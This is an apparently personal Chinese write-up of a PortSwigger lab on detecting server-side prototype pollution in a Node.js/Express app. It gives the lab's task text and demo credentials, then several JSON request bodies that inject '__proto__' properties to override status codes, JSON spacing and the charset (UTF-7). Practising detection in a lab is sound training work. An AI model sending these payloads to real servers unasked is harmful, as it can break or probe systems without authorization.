实验室：检测服务端原型链污染-无需反馈污染属性

题目

此实验室基于 Node.js 和 Express 框架构建。它容易受到服务端原型链污染的影响，因为它不安全地将用户可控输入合并到服务端 JavaScript 对象中。

若要解决实验室问题，请污染Object.prototype来确认漏洞，以触发服务器行为上的明显变化（非破坏性）。由于本次实验旨在帮助你练习无损检测技术，因此你不需要进行漏洞利用。

你可以使用以下凭据登录到自己的帐户：wiener:peter

笔记

在测试服务端原型链污染时，很可能会破坏应用程序功能，甚至完全关停服务器。如果发生这种情况，你可以使用实验室横幅中提供的按钮，来手动重启服务器。请记住，在测试真实网站时，你不太可能有此选项，因此你应该始终谨慎行事。

实验室-从业者

检测服务端原型链污染-无需反馈污染属性 >>

- name: 实验室-从业者
  desc: 检测服务端原型链污染-无需反馈污染属性 >>
  avatar: https://fastly.statically.io/gh/clincat/blog-imgs@main/vuepress/static/imgs/docs/burpsuite-learn/public/lab-logo.png
  link: https://portswigger.net/web-security/prototype-pollution/server-side/lab-detecting-server-side-prototype-pollution-without-polluted-property-reflection
  bgColor: '#001350'
  textColor: '#4cc1ff'

实操

（目前只有图，文字后面有时间补）

点击 “ACCESS THE LAB” 进入实验室。

报错状态码覆盖

{
  "address_line_1":"Wiener HQ",
  "address_line_2":"One Wiener Way",
  "city":"Wienerville",
  "postcode":"BU1 1RP",
  "country":"UK",
  "sessionId":"uLrCGqCHfgrfyDoDE23b1e2SvEjcX642",
  "__proto__":{
    "statusCode":410,
    "status":420,
  }
}

JSON空格覆盖

{
  "address_line_1":"Wiener HQ",
  "address_line_2":"One Wiener Way",
  "city":"Wienerville",
  "postcode":"BU1 1RP",
  "country":"UK",
  "sessionId":"uLrCGqCHfgrfyDoDE23b1e2SvEjcX642",
  "__proto__":{
    "json spaces": 10
  }
}

字符集覆盖

+AGYAbwBv-

{
  "address_line_1":"Wiener HQ",
  "address_line_2":"One Wiener Way",
  "city":"Wienerville",
  "postcode":"BU1 1RP",
  "country":"UK",
  "sessionId":"uLrCGqCHfgrfyDoDE23b1e2SvEjcX642",
  "__proto__":{
    "content-type": "application/json; charset=utf-7"
  }
}

综合

{
  "address_line_1":"Wiener HQ",
  "address_line_2":"One Wiener Way",
  "city":"Wienerville",
  "postcode":"BU1 1RP",
  "country":"+AGYAbwBv-",
  "sessionId":"uLrCGqCHfgrfyDoDE23b1e2SvEjcX642",
  "__proto__":{
    "statusCode":444,
    "status":444,
    "json spaces": 8,
    "content-type": "application/json; charset=utf-7"
  }
}

貌似污染过头了，重启一下程序服务，然后再完成实验